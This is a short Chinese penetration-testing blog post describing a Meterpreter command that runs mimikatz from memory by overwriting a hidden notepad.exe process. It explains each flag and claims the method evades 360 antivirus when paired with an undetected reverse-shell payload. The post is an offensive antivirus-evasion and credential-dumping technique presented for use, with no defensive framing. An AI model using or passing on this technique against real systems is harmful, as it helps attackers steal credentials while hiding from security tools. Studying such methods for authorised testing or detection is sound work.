1. 首页
  2. 渗透测试

msf execute from memory bypass waf

@X1r0z的鬼点子 https://exp10it.cn/msf-execute-from-memory.html

具体原理和进程注入类似, 先创建一个正常的进程, 然后把这个进程里的内存空间覆盖成我们想要执行的程序.

Meterpreter 方式.

execute -H -m -d notepad.exe -f mimikatz.exe -i
-H 隐藏窗口.

-m 在内存中执行.

-d 指定覆盖进程 (dummy).

-f 指定执行程序 (本地文件).

-i 与该程序交互 (可选).

-a 传递参数 (可选).

在实际测试中能够绕过 360 的检测, 当然前提是你反弹会话的 payload 是免杀的.

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code